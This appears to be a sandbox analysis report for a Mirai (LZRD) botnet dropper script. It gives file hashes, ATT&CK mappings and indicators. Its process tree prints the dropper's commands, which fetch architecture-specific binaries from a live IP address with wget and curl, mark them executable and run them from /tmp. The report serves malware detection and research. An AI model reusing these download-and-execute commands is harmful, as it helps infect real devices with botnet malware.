mirai | 8ee9185ac547822d6029ed8cfe19578b9771125077080985e4bc37938daaf030

Analysis

max time kernel
9s
max time network
10s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
16-12-2024 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.sh
Size

2KB
MD5

27997dbf677f04b714e6bbc6c8731b3a
SHA1

cdc488f161e0fdbd400b7fddfa7d3243105ee9a6
SHA256

8ee9185ac547822d6029ed8cfe19578b9771125077080985e4bc37938daaf030
SHA512

690ddc258ace9cdcb42fc1cd9e2f72fbb0613361a4f5e2fca9fc3a91fc1e61e9d799d52657ec6372093f32493a6f2b58a8a336346d81bc998aaca8cfe3e491b1

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
706	chmod
725	chmod
747	chmod
753	chmod
770	chmod
678	chmod
686	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/Space	679	Space
/tmp/Space	688	Space
/tmp/Space	707	Space
/tmp/Space	728	Space
/tmp/Space	748	Space
/tmp/Space	754	Space
/tmp/Space	771	Space

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx
behavioral2/files/fstream-9.dat	upx

Checks CPU configuration 1 TTPs 7 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 15 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
751	curl
752	cat
731	wget
739	curl
746	cat
750	wget

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space	1.sh
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space.mpsl	wget
File opened for modification	/tmp/Space.mpsl	curl
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.i686	curl
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.arm	wget

/tmp/1.sh
/tmp/1.sh
1⤵
- Writes file to tmp directory
PID:645
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:647
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:651
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:671
- /bin/cat
  cat Space.arc
  2⤵
  PID:677
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:679
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:681
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:682
- /bin/cat
  cat Space.x86
  2⤵
  PID:685
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:688
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:691
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:697
- /bin/cat
  cat Space.x86_64
  2⤵
  PID:704
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:707
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:709
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:716
- /bin/cat
  cat Space.i686
  2⤵
  PID:723
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:725
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:728
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:739
- /bin/cat
  cat Space.mips
  2⤵
  - System Network Configuration Discovery
  PID:746
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:748
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.mips64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/cat
  cat Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:752
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:754
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:755
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /bin/cat
  cat Space.mpsl
  2⤵
  PID:769
- /bin/chmod
  chmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-DITgE0
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:771
- /usr/bin/wget
  wget http://89.169.4.44/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:774
- /usr/bin/curl
  curl -O http://89.169.4.44/hiddenbin/Space.arm
  2⤵
  PID:780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
34KB

MD5
7fd15b25eadc2d7f94f4124546174e50

SHA1
2c056f909dbe70e262a7ab80426b7e088799b78e

SHA256
14a364908f6b67c83ce526976e8fccf4cff103d613866fb6e3da170e2e0a926f

SHA512
dd28a5c4d022da86df61bb6e60ddf04eeec747be632b4801c7f8115129e26ccf1c29b9f16bcae570435a303e87175dbb1b3c2b7c622e4453dba2aa9d7a68f47d

Download Submit
/tmp/Space

Filesize
36KB

MD5
f9cdbd1b6359b49143356cf79ac094ab

SHA1
e3679e2b4c1e536529aa0e59b25a2d51314d6fa4

SHA256
821e40e9f4161f17ead134c4b3dd0c687176a3afa317ecf283bccb9d24dfee5f

SHA512
43e08f3009b19180aeae6e8d92101fdc10cc039cf81c6f108ccf1348d0862eb9ae4533becc68b1d6d5f964cc70255c704a2a33b545ed36173d5e9e30d51dae20

Download Submit
/tmp/Space

Filesize
35KB

MD5
a56e91b6fcccccac6af83d4b96c2d3ed

SHA1
60b057a4285c39228b11e854362fd312fac1b94c

SHA256
78118c6996103986c325191eee210e688ffd355834c5f71ffc8eafb77638c73d

SHA512
357a37eab75a1936bb0642094babc9b6a3a98bf85832b853c23117a3203984dbfdde853b68e4174c76cce34b0a5ffeffb6bcc64e944dda608d7cbc5fd3539edf

Download Submit
/tmp/Space

Filesize
37KB

MD5
47a3da5b7a3334ad0d7d3e319d5e5876

SHA1
8710045d8e4ad5ab0561af69d328ba5bfe85ae85

SHA256
467f8730b3df7738935b68efa0309ed7b154dc14ca2e87d04e00fddd49d34a2e

SHA512
498eca619092e02b0529e37b710c8ae2b4cc23f4afb13b46dc90d67b9f5a17e46e32cc4964469a749e4adc7670ad2718f40387950069106a9f0b2507738334ab

Download Submit
/tmp/Space

Filesize
37KB

MD5
1117e2c5a98d68c484fd112dab8f93c6

SHA1
752445f32f9bc8387d51c38a6c91f9b7ad67cdf6

SHA256
083aba1f74c9302697ab2c7442799b4bb7f0cd77d4fc8310f2460a9c087f3704

SHA512
f72812645a532dfe4984e1de484eaa0e1819ff0d29570ce6594a175a865dad0365740d1004578e06803ab217960be3debfa604cbf04f0144239068e4685c62ab

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
df48b559206b579e49b8fe67877af3ad

SHA1
05509c76e87089fb3cc8f73dcb62b203c2268436

SHA256
787021c436a55881b06f80e8a59f944892e912cdf1960998f907666616aef1e1

SHA512
ea4493023059948a5db21a83e0a46469660e77d3f79967531fb552bf1b69ad85ade859225e30f2cecec9133715c26e052cd625d0d858b51bdc1186666840edca

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads